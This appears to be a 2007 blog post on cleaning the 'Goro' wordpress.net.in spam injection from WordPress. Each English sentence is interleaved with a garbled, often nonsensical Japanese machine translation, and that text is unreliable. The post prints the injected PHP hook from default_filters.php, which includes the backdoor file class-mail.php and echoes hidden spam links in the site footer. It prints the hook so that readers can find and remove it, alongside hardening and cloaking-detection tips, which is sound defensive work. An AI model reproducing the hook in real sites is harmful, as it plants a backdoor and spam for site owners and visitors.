I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in).この中見つけたWordPressのサポートフォーラムの閲覧、更新プログラムのいくつかの犠牲者とそのdefault_filters.php クラス- mail.phpの内側にWordPressのアップロードしているの認識してこれはバックドア ( wordpress.net.in ) 。 There is no class-mail.php in WordPress except class-phpmailer.php . クラスがないクラスを除いてmail.phpにWordPress phpmailer.phpです。 So don’t get confuse by it.混同されていないので入手してください。
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.以下は簡単な問題を回避する方法については不愉快な吾郎することができます。スパムウェア注射する前に削除してGoogleのインターネットからのパイプを禁止します。
Workaround回避策
- For temporary disable remote include in php.ini settings. php.iniのリモート含まれて一時的に無効に設定を変更します。
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;; ; fopenラッパー; ;;;;;;;;;;;;;;;;;; ;の治療を許可するかどうかのURL (のようなhttp://やftp:// )としてファイルです。 allow_url_fopen = off allow_url_include = off allow_url_fopen =オフallow_url_include =オフ
- Check your .htaccess for suspicious redirect.確認してください。 htaccessを不審にリダイレクトします。
- Find class-mail.php inside “*/wp-includes/” directory and removed it. クラス- mail.php内を検索" * /のWP -含まれて/ "ディレクトリを削除してください。
- Find the following code inside “*/wp-includes/default_filters.php” and removed it内側に、次のコードを検索" * / wp-includes/default_filters.php "と削除すること
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( ' wp_footer ' 、 ' wpc7c16b8466d864eeefd20050625c7775 ' ) ;関数wpc7c16 < > b8466d864eeefd20050625c7775 ( ) ( @含める( ' 。 / WPの-が含まれ/クラス- mail.php ' ) ;場合( sizeof ( $ wparr ) > 0 ) (エコー" !領域番号= \ "吾郎\ " ! " ; foreach ( $ wparrとして$ k = > $ v ) (エコー" " 。 ucwords ( $ Ⅴ [ 'キー'])." \ n " ;場合( $私 = = $ inum )ブレーク; )エコー" ! /フッター領域!".$_ ; ) ) Robots.txt Exclusion robots.txtの除外
Optional - Prevent googlebot from indexing the static spam page. オプション -静的な迷惑メールを防ぐのインデックス作成がよりG ooglebotのページをご覧ください。
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”.にログインしてWordPressの管理" >管理>ファイル> →のキーを他のファイルて" robots.txt "です。 Add the following code.次のコードを追加しています。User-agent: Googlebot Disallow: /*?* Disallow: /*?ユーザーエージェント: Googlebotの禁止: / *ですか? *禁止: / *ですか?Refer robots.txt .参照robots.txtのです。
Possible WordPress class (suspicious) files that would be tempered可能性のWordPressのクラス(不審な)ファイルそれは鍛え
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . MD5チェックサムは、以下のファイルは、公式のバージョンを比較してよりWordPressのリリースアーカイブします。
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities.上記の方法スパムのリンクのみを削除し、無効にして、その保証はないことは将来の脆弱性を保護するからです。 Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade .バックアップ(またはエクスポートしてWordPressの拡張を使用して投稿のRSS - wrx )と実行を完全にアップグレードします。
- Dec 13, 2007 2007年12月13日
I just notice this recently.ただ、この最近通知します。 You’ll need to check your site HTTP Header.お客様のサイトをチェックする必要があります。 HTTPヘッダーです。 Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) .ハイジャックされたほとんどのウェブサイトはありませんレスポンスが正しいHTTPステータスヘッダー( 400 < > 500 )です。 My guess is they did this to cloak from being crawl by search engine spiders.私の推測は、彼らはこれをクロークから検索エンジンスパイダーがクロールされています。 If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner .掃除する場合は、感染ファイルおよび独自のヘッダーのすべての反応はありませんが正しく取得するrookitスキャナです。
Check your website status header, try cloak your browser (UA) as Search Engine Crawler.ウェブサイトのステータスのヘッダーを確認してみてくださいクロークお使いのブラウザ( ua )として検索エンジンのクローラです。 The following screenshot will show you how to setup this at web-sniffer.net.は、次のスクリーンショットが表示さを設定する方法について説明これはウェブ- sniffer.netです。
This methods may not work if the cloaking scripts used IP base tracking.この方法の場合、動作しないことがありますクローキングのIPベースのトラッキングスクリプトを使用される。 So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).試着するので別のユーザーエージェント文字列(例: inoktomi 、 askjeeves 、 ia_archiver ) 。
Firefox Browser Firefoxブラウザ
You can also override your useragent string with firefox ↓.ユーザーエージェント文字列を上書きすることもできますが、 Firefox ↓しています。
about:config → general.useragent.overide = ‘ ua strings ‘ about : configを→ general.useragent.overide = ' ua文字列 '
Wordpress.net.in Backdoorバックドアwordpress.net.in
Wordpress.net.in Doorway wordpress.net.in戸口
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ 2007年12月24日 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Filesバックドアファイル
inside wp-includes directory.内側のWP -含まれてディレクトリに移動します。
- compat.php - (replace with latest version) compat.php -( 置換後の最新版)
- class-mail.php deleteクラス- mail.php を削除
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins .スキャン&削除のすべてのファイルとバックドアを作成する。 htaccessファイル内のWP & wp-content/pluginsが含まれています。 Then add the following code to disabled directory listing (prevent informations leak & Directory search index).次のコードを入力し、追加して無効になってディレクトリ一覧(情報漏れを防ぐ&ディレクトリ検索インデックス)です。
Options -Indexesオプション-インデックス Wordpress.net.in New Partner新しいパートナーwordpress.net.in
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 2008年2月23日 、私たちが見つかりました、同様の署名のようにwordpress.net.in qwetro.com (ドイツ)です。 Probably from the same attacker with different agenda.攻撃者が異なるから、おそらく議題と同じです。
Related Posts関連記事
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) 代表取締役のブログbluehost hostmonsterハッキング( wordpress.net.in )
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II マットヒートンbluehost hostmonster CEOのハッキング再び-スト2世
External Links外部リンク
- Websniffer View HTTP Request and Response Header websniffer対象のHTTPリクエストとレスポンスヘッダ
- Wordpress Support Forum WordPressのサポートフォーラム
- National Vulnerability Database Wordpress 2.0 > 2.0.6 WordPress 2.0の脆弱性データベース国立> 2.0.6
16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16レスポンス を"迷惑メールを削除する方法のwordpress.net.in注射液"
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] enakな問題は、 vendarまたはですか? itno jih zeloマロrešiloはすべてのskupajです。 Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Googleのampakばですか? udeže : wordpress.net.inマークを削除する方法を注射液に感染した'吾郎'マーククラス- mail.phpバックドアにはrešitev [...]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...]私はいくつかの有用な情報を見つける清潔度を台無しにする方法をkakkoi : wordpress.net.inマーク注入する方法を削除します。 [...]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] wordpress.net.inのページ数を明らかにするなど、ブログのエントリが記載されている現象とavice de'vereuxによるとマーク注射液によって引き起こされる彼らはハイジャックされ[...]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...]は、どのようなテーマを発見ゴードン: googlingのwordpress.net.inのページ数を明らかにするなど、ブログのエントリに記載されている現象とavice de'vereuxが原因で発生する迷惑メールによると彼らは注射液ハイジャックされ[ .. 。 ]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...]私を完全にリード[...]ワンダフルライフ節約aviceの投稿、ここで彼女に指示を削除する方法[...]
[...] en is alle gehackte code gevonden. [...]アンはalle gehackteコードgevonden 。 Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen.最終更新hebben mochtはヴァンド部番号= "吾郎"ハックダンkijk hier voor eens voor het verwijderen handigeのヒントです。 Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...]パソコンklusjes zou geen alhoewel益voorlopig欧州連合ガーン私たちtoch [...]
I got hacked to, mine was spam links to私はめった切りされ、鉱山は、迷惑メールのリンクを
donaldsensing.com:6666 donaldsensing.com : 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [...]関連:ブログからセンターステージを削除する方法についてのマーケティング担当者やGoogle wordpress.net.inマーク注射液[...]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name. whoがよいのか分からない" alxumuk "本当の名前は、しかしにはエディタはdmoz 、同様の表示名を入力します。
Lack Resources 資源不足ATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies.私だけのATMからは、いくつかの生accesslogをマーレーのブログ & イェンスさんのブログです。 マットヒートン決して返信します。
I hope that Mr. Goro got careless and show his footprint, I need more raw access log.私は期待して吾郎氏不注意と詳細彼の足跡、生のアクセスを増やす必要がログに記録します。 Send it to my emailに送信することが私の電子メール
[...] might go Here to learn the way to remove the Spam [...] [...]かもしれないへの道を学ぶにはここを削除してマーク[...]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. Mozillaプロジェクトの共同創設者のWordPressのblogのハッキング...ブレイクロスは、 Mozillaプロジェクトの共同創設者のWordPressのblogのハッキングさwordpress.net.inブラックspammerのです。 ......